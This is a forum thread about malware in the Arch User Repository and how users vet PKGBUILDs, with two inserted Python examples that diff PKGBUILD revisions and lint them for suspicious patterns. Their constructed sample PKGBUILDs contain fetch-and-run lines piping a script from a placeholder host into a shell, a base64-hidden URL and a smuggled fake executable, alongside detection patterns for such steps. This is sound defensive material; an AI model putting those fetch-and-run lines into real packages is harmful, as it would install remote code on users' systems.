  • Gyroplast@pawb.social · 25 points · 4 hours ago

    TL;DR: Don’t think of the AUR as a package source, but as an only mildly moderated, but ultimately free and open, sharing platform for PKGBUILDs, primarily useful for (self-)packagers, not necessarily non-technical end users.

    Before the AUR, you had people individually hosting their PKGBUILDs anywhere, sometimes on GitHub or the BBS (yeah, it’s been a while), sometimes along with a repository URL you could add to your pacman.conf to install packages right away, and it was glorious. I didn’t have to write a working PKGBUILD myself from scratch, and I could decide if I trusted that particular packager to not screw me sideways with a pre-built package. An officialized “Trusted User” (TU) role emerged from this idea, which has recently been renamed to Package Maintainer (PM). This is fundamentally still how the AUR works, it just became much bigger, and easier to search for particular software. Packagers gift to you their idea of how software should be packaged, for you to expand upon, take inspiration from, or learn, or use as-is if you determine it to be good for your purpose.

    The AUR is ultimately a great resource for packagers, and still useful for users, but “true end users” get the extra repository, and community, kind of, before that, and should try to avoid the AUR if they can, or at least be prepared to put in effort to establish trust, or get help.

    A handful of Package Maintainers are manually adopting and subsequently vetting for sufficiently popular packages to move them from the AUR to the official extra repository, which is deemed safe to use as-is, on a best-effort basis. Obviously, this is a bottleneck, as it is not feasible for the few volunteering PMs to adopt and maintain 10k+ AUR packages and be held to any quality standard. That’s why “you are on your own” with the AUR.

    On the positive side, there’s a voting system to determine package popularity. AUR packagers have a public list of maintained packages, and a comprehensive git commit history. Establishing trust is still crucial, and I feel hard pressed to name a reasonably popular/useful package that isn’t already in extra or has been maintained in the AUR for a long time.

    The biggest risk, IMHO, for malware getting slipped into a package is orphaning a popular package, and having it adopted by a malevolent user. This is something I personally look out for. If the maintainer changed, I make sure to check the commit history to see what they did. Most of the time it’s genuine fixes, but if anything is changed without a damn good and obvious reason, hit up the AUR mods and ask for help. This is how malware is spotted. Also, typically only the version is bumped in a PKGBUILD on an update, which is a change I feel safe waving through, too. If the download URI changes, or patches are added, I do look at them to determine the reason, and if that isn’t explained well enough to understand, that’s a red flag. Better ask someone before running this.

    source: personal involvement in Arch since 2002
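The review routine described in the comment above (did the maintainer change, is it only a version bump, did the download URI or the patch list move, did build steps change) as an added Python example; this is not code from the post or from the AUR project. It assumes you have already fetched two revisions of the PKGBUILD from the package's AUR git history; here both revisions are constructed inline with placeholder names, hosts and checksums, and `review_update()` is a hypothetical helper name.

```python
import re
from difflib import unified_diff

# Constructed sample: the previous revision of a hypothetical AUR PKGBUILD.
# Names, hosts and checksums are placeholders, not a real package.
OLD_PKGBUILD = """\
# Maintainer: Alice Example <alice@example.invalid>
pkgname=example-tool
pkgver=1.4.0
pkgrel=1
pkgdesc="Hypothetical tool used only to illustrate review checks"
arch=('x86_64')
url="https://example.invalid/example-tool"
license=('MIT')
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

# Revision A (constructed): the routine update the comment describes,
# only pkgver and the matching checksum move.
BUMP_PKGBUILD = (OLD_PKGBUILD
                 .replace("pkgver=1.4.0", "pkgver=1.4.1")
                 .replace("0" * 64, "1" * 64))

# Revision B (constructed): the kind of change that warrants a closer look:
# new maintainer, an extra source from another host, and a new prepare() step.
SUSPECT_PKGBUILD = (OLD_PKGBUILD
    .replace("# Maintainer: Alice Example <alice@example.invalid>",
             "# Maintainer: New Adopter <adopter@example.invalid>")
    .replace('source=("https://example.invalid/example-tool-$pkgver.tar.gz")',
             'source=("https://example.invalid/example-tool-$pkgver.tar.gz"\n'
             '        "fix.patch::http://mirror.example.invalid/fix.patch")')
    .replace("build() {",
             "prepare() {\n  curl -s http://mirror.example.invalid/setup.sh | sh\n}\n\nbuild() {"))

# name() { ... } blocks; bodies are compared verbatim between revisions.
FUNC_RE = re.compile(r"^(\w+)\(\)\s*\{\n(.*?)^\}", re.M | re.S)

# Content patterns that should never be waved through as "just an update".
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b"), "remote content piped into a shell"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"\beval\b"), "eval of dynamic content"),
    (re.compile(r"\bhttp://"), "plain-http download"),
    (re.compile(r"/dev/tcp/"), "raw bash network socket"),
]


def parse_fields(text):
    """Pull the few PKGBUILD fields a reviewer compares between revisions."""
    fields = {}
    m = re.search(r"^#\s*Maintainer:\s*(.+)$", text, re.M)
    fields["maintainer"] = m.group(1).strip() if m else None
    for name in ("pkgver", "pkgrel", "url"):
        m = re.search(rf"^{name}=(.*)$", text, re.M)
        fields[name] = m.group(1).strip().strip("\"'") if m else None
    for name in ("source", "sha256sums"):
        m = re.search(rf"^{name}=\((.*?)\)", text, re.M | re.S)
        fields[name] = re.findall(r"[\"']([^\"']*)[\"']", m.group(1)) if m else []
    return fields


def review_update(old_text, new_text):
    """Classify an AUR revision: a bare version bump, or changes that need a stated reason."""
    old, new = parse_fields(old_text), parse_fields(new_text)
    flags = []
    if old["maintainer"] != new["maintainer"]:
        flags.append(f"maintainer changed: {old['maintainer']!r} -> {new['maintainer']!r}")
    if old["url"] != new["url"]:
        flags.append(f"upstream url changed: {old['url']!r} -> {new['url']!r}")
    if old["source"] != new["source"]:
        added = [s for s in new["source"] if s not in old["source"]]
        flags.append(f"source list changed, new entries: {added}")
    if len(new["sha256sums"]) != len(new["source"]):
        flags.append("checksum count does not match source count")
    old_fn, new_fn = dict(FUNC_RE.findall(old_text)), dict(FUNC_RE.findall(new_text))
    for name in sorted(set(old_fn) | set(new_fn)):
        if name not in old_fn:
            flags.append(f"new function {name}()")
        elif name not in new_fn:
            flags.append(f"function {name}() removed")
        elif old_fn[name] != new_fn[name]:
            flags.append(f"body of {name}() changed")
    for pattern, why in SUSPICIOUS:
        for m in pattern.finditer(new_text):
            flags.append(f"{why}: {m.group(0).strip()!r}")
    version_moved = (old["pkgver"], old["pkgrel"]) != (new["pkgver"], new["pkgrel"])
    return {
        "version_bump_only": version_moved and not flags,
        "flags": flags,
        "diff": list(unified_diff(old_text.splitlines(), new_text.splitlines(),
                                  "PKGBUILD (old)", "PKGBUILD (new)", lineterm="")),
    }


if __name__ == "__main__":
    for label, text in (("routine bump", BUMP_PKGBUILD), ("adopted package", SUSPECT_PKGBUILD)):
        result = review_update(OLD_PKGBUILD, text)
        print(f"== {label}: version bump only = {result['version_bump_only']}")
        for flag in result["flags"]:
            print("   FLAG", flag)
```

On real input, replace the two inline strings with `git show <old>:PKGBUILD` and `git show <new>:PKGBUILD` from the AUR clone. Anything in `flags` is exactly the list the comment says should be explained in the commit message or asked about; a checksum change alone is expected on a version bump and is deliberately not flagged, while a new source entry without a matching checksum is.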

  • Maragato@lemmy.world · 2 points · edited · 3 hours ago

    AUR is probably the main reason why many people use Arch and derivatives. However, many users are unaware that the AUR is not an official Arch repository and that, as you say, you are the one who has to monitor the PKGBUILDs of each installed AUR package. Normally the most used AUR packages tend to generate more confidence, but that does not prevent a package from including malicious software in a version change, which, having root access to the system, can take control of certain system services. That’s why I always recommend not using the AUR, and that’s why I’ve always found Manjaro to be a great distribution, as it retains packages for a few days to check them and discourages the use of the AUR. Any security measure is too little, and that’s why any security tool you can configure is advisable. In a rolling distribution where new code is constantly entering the system, it is essential to have SELinux and Secure Boot enabled.

    • prole@lemmy.blahaj.zone · 2 points · edited · 2 hours ago

      > Aur is probably the main reason why many people use Arch and derivatives.

      FYI, non-Arch distros can use AUR with an Arch distrobox. So people shouldn’t be using Arch just for AUR.

      Being in a distrobox may or may not protect your system from potential malware, that I cannot say.

  • pedz@lemmy.ca · 9 points · 6 hours ago

    I’ve been using Debian for years and prefer deb based systems, but recently I messed a bit around with Manjaro, and the amount of packages only available from the AUR is, erm, remarkable.

    • prole@lemmy.blahaj.zone · 1 point · 2 hours ago

      At risk of repeating myself from another comment here: you can access the AUR from other distros by making an Arch distrobox. It’s actually super easy.

    • Ŝan@piefed.zip · 5 up / 3 down · 5 hours ago

      I discovered recently, þanks to a discussion wiþ a Lemmy user, ðat NixOS has even more. I was surprised. Looking at ðe relative popularity of ðe distributions, and ðe number of package contributors of each, I’m guessing ðat many NixOS users submit packages. I guess when configuring your system is essentially ðe same as building a package, ðe submission barrier is lower. Also, NixOS seems to make pushing flakes up into ðe shared repos for everyone else to use almost trivial.

      • Ŝan@piefed.zip · 3 points · edited · 5 hours ago

        A vast number of volunteers, far exceeding ðe proportional popularity of Nix. It’s as if every Nix user submits a package.

        But Nix hasn’t achieved ðe popularity Arch has, yet, so it’s probably flying under ðe attacker radar.

  • DonutsRMeh@lemmy.world · 43 points · 14 hours ago

    I smell something fishy going on. I’ve been using the AUR for a long time and I’m now just hearing of malware?

    • Shareni@programming.dev · 14 points · 7 hours ago

      It’s an obvious vector for malware, Arch by default doesn’t come with it, and users have been warned the entire time to check the PKGBUILD. There’s nothing fishy, it’s just that Arch has enough users to be worth it to hit it.

    • Possibly linux@lemmy.zip · 40 points · 12 hours ago

      The AUR is made up of user packages

      It isn’t crazy that malware made it in. It is very much a “use at your own risk.” Packages are reviewed but sometimes things slip in.

      • bryndos@fedia.io · 2 up / 2 down · 4 hours ago

        Yeah, you get choice, and it’s better than a random closed exe in Windows.

        Some people have really odd expectations of “free” and “open”.

        Is there a choosingbeggars community to repost this to?

        Just make sure the aur wears a condom when it’s going to fuck you, like your mother told you.

    • Zikeji@programming.dev · 75 points · 14 hours ago

      There’s been malware in the past, not only that - AUR is user submitted. It’s in the name. They warn you to double check what you’re installing. It is functionally similar to running a random installer you found on GitHub.

      It seems like these instances are being intentionally blown out of proportion, but I don’t see what there is to gain by doing that.

      • kadu@lemmy.world · 60 up / 2 down · edited · 12 hours ago

        > It is functionally similar to running a random installer you found

        So basically how Windows users have been acquiring their software for the last 30 years.

        • dan@upvote.au · 4 up / 1 down · 10 hours ago

          Technical users that are comfortable at a command line often use WinGet these days. It works in Windows Sandbox too; you just need to manually install it.

          • AdamBomb@lemmy.sdf.org · 1 point · 34 minutes ago

            My ranking of package managers on Windows:

            1. Chocolatey: the oldest and has the most packages. Packages are AV scanned. Enterprisey.
            2. Scoop: Somewhat fewer packages, but easier to package for. More technical focus. FOSSy.
            3. Winget: fewest packages, and Microsoft literally stole it from its creator. I’m not aware of any reason to use winget over choco or scoop.
          • kadu@lemmy.world · 1 point · 1 hour ago

            Sure. Doesn’t change anything about my comment though, Winget is relatively new and unknown for most users.

      • DonutsRMeh@lemmy.world · 7 points · 13 hours ago

        I don’t want to say stupid things, but I have so many theories. I check the shit out of a package before installing it. I even go to the GitHub page and make sure of things.

        • Ŝan@piefed.zip · 2 up / 4 down · 5 hours ago

          Ðis is ðe only way. Checking ðe PKGBUILD is a silly step ðat only prevents ðe laziest of attacks.

          It’s a reason why, as a developer, I’ve been getting increasingly strident about limiting dependencies in my projects. I feel obligated to re-audit dependencies every time I version bump one, and it’s getting painful to ðe point where I just don’t want to do it anymore. So, I only use dependencies when I absolutely have to, and I prioritize libraries ðat ðemselves have shallow dependency trees: because I have to also audit ðeir dependencies.

          Ðe OSS community needs to focus on static analysis tools for injection attacks. Linters which warn of suspicious operations, such as obfuscated URLs or surreptitious network calls, or attempts to write binary executable-looking blobs. Hell, if we can have UPX, we should be able to detect executables for a platform.

          Get some good security linters, and people will write linting services ðat provide badges, or which distro maintainers can build into ðe package submission process.

          I’ve looked, and I’ve found no tooling wiþ ðis sort of focus for Go, which is a language which usually has robust and comprehensive developer tooling. Ðe only security linter I’ve found reports merely on bog standard programmer mistakes, like not validating strings.
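The static checks proposed in the comment above (flagging obfuscated URLs, surreptitious network calls and text that hides an executable) applied to a PKGBUILD, as an added Python example; this is not code from the post, and it is not an existing linter. It assumes the PKGBUILD text as input; the sample below is constructed for the demonstration, its encoded strings are generated in place so nothing is hidden, and `lint_pkgbuild()` is a hypothetical helper name.

```python
import base64
import binascii
import re

# Constructed inputs: the encoded literals are built here so the sample is
# self-describing; "example.invalid" is a reserved, non-resolvable name.
HIDDEN_HOST = base64.b64encode(b"http://example.invalid").decode()
FAKE_ELF = base64.b64encode(b"\x7fELF\x02\x01\x01" + b"\x00" * 13).decode()

SAMPLE_PKGBUILD = f"""pkgname=example-tool
pkgver=2.0.0
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')

prepare() {{
  cd "$pkgname-$pkgver"
  h=$(echo {HIDDEN_HOST} | base64 -d)
  curl -fsSL "$h/x.sh" | bash
  echo "{FAKE_ELF}" | base64 -d > "$srcdir/helper"
}}
"""

# A plain PKGBUILD (constructed) that the linter should pass without findings.
CLEAN_PKGBUILD = """pkgname=example-tool
pkgver=2.0.0
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('1111111111111111111111111111111111111111111111111111111111111111')

build() {
  cd "$pkgname-$pkgver"
  make
}
"""

# Textual rules: operations a PKGBUILD rarely needs and an attacker often does.
RULES = [
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b"), "remote content piped into a shell"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "decodes an embedded base64 payload"),
    (re.compile(r"\beval\b"), "eval on dynamic content"),
    (re.compile(r"\bhttp://"), "plain-http URL, no transport integrity"),
    (re.compile(r"/dev/tcp/"), "raw bash network socket"),
    (re.compile(r"sha\d+sums=\(\s*'SKIP'"), "checksum verification skipped (only normal for VCS sources)"),
]

# Magic bytes of executable formats: a decoded literal starting with one of
# these is a binary being smuggled in as text.
EXEC_MAGIC = {
    b"\x7fELF": "ELF executable",
    b"MZ": "PE/DOS executable",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit executable",
    b"#!": "script with shebang",
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
PRINTABLE = re.compile(rb"[\x20-\x7e]+")
URLISH = re.compile(rb"https?://|/dev/tcp/")


def decode_b64_literals(line):
    """Yield (token, decoded bytes) for each base64-looking token that decodes cleanly."""
    for m in B64_TOKEN.finditer(line):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        yield m.group(0), raw


def lint_pkgbuild(text):
    """Return (line number, reason, evidence) findings for a PKGBUILD's text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern, why in RULES:
            if pattern.search(line):
                findings.append((lineno, why, line.strip()))
        for token, raw in decode_b64_literals(line):
            kind = next((k for magic, k in EXEC_MAGIC.items() if raw.startswith(magic)), None)
            if kind:
                findings.append((lineno, f"base64 literal decodes to {kind}", token[:24] + "..."))
            elif PRINTABLE.fullmatch(raw) and URLISH.search(raw):
                findings.append((lineno, f"base64 literal hides text: {raw.decode()!r}", token[:24] + "..."))
    return findings


if __name__ == "__main__":
    for lineno, why, evidence in lint_pkgbuild(SAMPLE_PKGBUILD):
        print(f"line {lineno}: {why} [{evidence}]")
    print("clean sample findings:", lint_pkgbuild(CLEAN_PKGBUILD))
```

The decoding step is what makes the difference against the "obfuscated URL" case: the plain `http://` rule never fires on the sample, because the host only exists in encoded form, but decoding every base64-looking literal and checking it for URLs or executable magic bytes surfaces both the hidden host and the smuggled ELF header. Heuristics like these produce false positives (a `SKIP` checksum is routine for git sources), so they are review prompts, not verdicts.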

  • Technus@lemmy.zip · 53 up / 1 down · 14 hours ago

    Does anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?

    • JackbyDev@programming.dev · 2 points · 3 hours ago

      Sort of, but I don’t know what I’m looking for. It would be nice if folks explained what a bad one looks like.

    • Ŝan@piefed.zip · 4 up / 2 down · 6 hours ago

      I keep hearing people say ðis like it’s a defense against malware and supply chain attacks.

      Reviewing PKGBUILDs only protects against dumb laziness on ðe part of ðe attacker, like ðey just install a stupidly obvious binary called “virus”.

      What are you checking for in ðe PKGBUILD?

    • 0xD@infosec.pub · 2 points · 6 hours ago

      Also with paru. I mainly check that the download shows the correct URL and does standard stuff with it.

    • Overspark@feddit.nl · 6 points · 8 hours ago

      Yeah, paru makes it pretty easy to do, and can also build packages in a chroot, adding some extra security.

    • tomkatt@lemmy.world · 39 points · edited · 13 hours ago

      I do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.

  • Kalcifer@sh.itjust.works · 7 points · 10 hours ago

    Is this post intended to be a sort of outcry around the idea that there’s a risk of malware being in the AUR?

  • odama626@lemmy.world · 4 up / 2 down · 7 hours ago

    Was there for 2 days before it was caught, and they would have had to be manually installed?

    I think that’s much safer than any other platform I’ve heard of